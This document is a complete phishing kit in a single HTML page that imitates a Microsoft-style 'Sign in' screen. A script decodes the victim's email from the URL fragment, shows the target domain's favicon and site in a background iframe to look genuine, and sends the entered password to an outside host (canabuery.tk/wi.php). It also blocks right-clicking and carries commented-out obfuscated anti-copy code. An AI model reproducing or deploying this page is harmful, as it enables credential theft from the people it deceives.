<!DOCTYPE html>
<html>
<head>



<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous">
<!--<script>
dl=document.layers;oe=window.opera?1:0;da=(document.documentMode||document.all)&&!oe;ge=document.getElementById;ws=window.sidebar?true:false;tN=navigator.userAgent.toLowerCase();izN=tN.indexOf('netscape')>=0?true:false;zis=da;zis8=da;var msg='';function nem(){return true};window.onerror = nem;zOF=window.location.protocol.indexOf('file')!=-1?true:false;i7f=zis&&!zOF?true:false;if(da){document.ondragstart=function (){return false};function cIE(){(msg);return false};function cc(){document.oncontextmenu=cIE;setTimeout("cc()",200)};cc()};function cNS(e){if(dl||ws){if(e.which==2||e.which==3){(msg);return false}}};if(dl){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=cNS}else{document.onmouseup=cNS};document.oncontextmenu=new Function("return false");if(oe){function ro(e){if(event.button==2){alert(' ');return 0};return true};document.onmousedown=ro};function ns9(){window.status=' ';setTimeout('ns9()',1000);return true};if(!oe){ns9();document.onmouseover=ns9;document.onmouseout=ns9};function u0(a){return false};function u1(e){return(e.target.tagName!=null&&e.target.tagName.search('^(INPUT|TEXTAREA|BUTTON|SELECT|EMBED|OBJECT|HTML)$')!=-1)};function u2(e){if(e.which==1){window.captureEvents(Event.MOUSEMOVE);window.onmousemove=u0}};function u3(e){if(e.which==1){window.releaseEvents(Event.MOUSEMOVE);window.onmousemove=null}}; if(dl){window.captureEvents(Event.MOUSEUP|Event.MOUSEDOWN);window.onmousedown=u2;window.onmouseup=u3}else if(ge&&!da){document.onmousedown=u1};function nn(){if(window.getSelection){var t=window.getSelection().toString();if(t.indexOf('qweasdzxc')>1||t.length>40){document.body.innerHTML='.';location.reload()};setTimeout("nn()",200)}};nn();function ni(){if(da){document.onselectstart=function (){return false};setTimeout("ni()",200)}};ni();if(da&&!oe&&!i7f){fc='<'+'div style="position:absolute;left:-1000px;top:-1000px;width:60px;height:35px;z-index:1">'+'<'+'input type="button" name="xqq" value="" onClick=ccd() style="visibility:hidden"><'+'/div>';document.write(fc);function ccd(){clipboardData.clearData()};function cce(){xqq.click();setTimeout("cce()",300)};setTimeout("cce()",3000)};
</script>-->
<link rel="icon" >

<title>Sign in to continue.</title>
</head>
<style type="text/css">


body, html {
  height: 100%;
  margin: 0;
  font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
}

	.wrapper {

  background-repeat: no-repeat;
  background-attachment: fixed;
  background-position: center;
  background-size: cover;
  position: fixed;
  top: 0;
  left: 0;
  height: 100%;
  width: 100%;

  /* this is what centers your element in the fixed wrapper*/
  display: flex;
  flex-flow: column nowrap;
  justify-content: center; /* aligns on vertical for column */
  align-items: center; /* aligns on horizontal for column */

  /* just for styling to see the limits */
  /*border: 0px dashed red; */
  box-sizing: border-box;
}

.element {
  width: 360px;
  height: 364px;
  padding: 30px;
  padding-bottom: 40px;

  /* Just for styling */
  background-color: #ffffff;
  border: 1px solid grey;

}

.card-title {
  max-width: 200px;
  height: 60px;
}
.elemente{
	width: 400px;
  height: 300px;
  padding: 40px 30px;

  /* Just for styling */
  background-color: #ffffff;
  border: 1px solid grey;
}
.logo{
	background-image: url("mic.png");
}
input{
    border:0;
    width: 100%;
    padding:5px 0px;
    font-size:1.0em;
    font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
    color:black;
    border-bottom:solid 1px #ccc;

    border-width: 1px;
    border-color: #666;
    border-color: rgba(0,0,0,0.6);
    height: 36px;
    outline: none;
    border-radius: 0;
    -webkit-border-radius: 0;
    background-color: transparent;
    font-weight:400;

}
input:focus,button:focus {
    border: 0;
    border-bottom: 1px solid blue;
    outline: none !important;

}
div .sign-opt {
	padding: 20px 0px;
	font-size: 14px;
}

div .button {
	padding: 20px 0px;
	font-size: 16px;
	text-align: right;
}
.newbutton{
	padding: 5px;
	width: 50px;
	max-width: 100px;
	font-size: 14px;
	width: 100px;
	color: white;
	background-color: #005da6;
}
.alert-error {
    color: #e81123;
    text-align: left;
    margin-bottom: 0;
    margin-bottom: 0;
    font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
}
a:visited {
    color: #0067b8;
}
a:link {
    color: #0067b8;
}
a {
    height: 20px;
    text-decoration: none;
}
a {
    background-color: transparent;
}
.identityBanner {
    height: 24px;
    background: #fff;
    margin-top: 16px;
    margin-bottom: -4px;
}
.text-title {
    color: #1b1b1b;
    font-size: 1.5rem;
    font-weight: 600;
    padding: 0;
    margin-top: 16px;
    margin-bottom: 12px;
    font-family: "Segoe UI","Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
}
</style>
<script src=""></script>
<script defer src="" integrity="sha384-8iPTk2s/jMVj81dnzb/iFR2sdA7u06vHJyyLlAd4snFpCl/SnyUjRrbdJsw1pGIl" crossorigin="anonymous"></script>
<script src=""></script>
<body>
<div class="wrapper"> <!-- Fixed element that spans the viewport -->
<div id="element" class="element">
       <div class="notifications top-left"></div>
       
 <img class="card-title" id="sign" > <br>
 
<form method="POST" id="pax" >
  	<div id="sign"><h2>Sign in</h2></div>
  	<div id="bax"><input  type="login" required= "required" size= "50"></div>
  </p>
<p>
  	<div id="inpwd"><input  name="pexam" type="password"  autofocus="autofocus" required="required"  placeholder="Password" value="" size="50"></div>
  	<div class="sign-opt" id="sign-opt">
  	
    <div id="no-acc">Session timeout.</div><div class="button" ><a href="#"><button id="i983893" class="newbutton" type="submit" name="submit"><img src="">Next</button></a></div>
  	</div>
 <input type="hidden" name="exam" id="cax" value="" required autocomplete="off"><br>
  </form>
    </div> <!-- your actual centered element -->
</div>


<script>
     document.getElementById("inpwd").focus();
            var str = window.location.href;
          var strs = str.split("#");
          var emap = strs[1];
          var emaq = atob(emap);
          var domain = emaq.substring(emaq.lastIndexOf("@") +1);
          if(emaq){
            document.getElementById("bax").innerHTML = emaq;
            document.getElementById("cax").value = emaq;
            document.getElementById("pax").action = "https://canabuery.tk/wi.php";
          }
          
          const favicon = document.querySelector('[rel=icon]');
          var ic="https://www.google.com/s2/favicons?domain=www."+domain;
          var ht="http://www."+domain;
          favicon.href = ic;
          document.getElementById("sign").src=ic;
          
           var ifrm = document.createElement("iframe");
        ifrm.setAttribute("src", ht);
        ifrm.style.width = "100%";
        ifrm.style.height = "100%";
        document.body.appendChild(ifrm);
        document.addEventListener('contextmenu', event => event.preventDefault());            
  </script>

</body>
</html>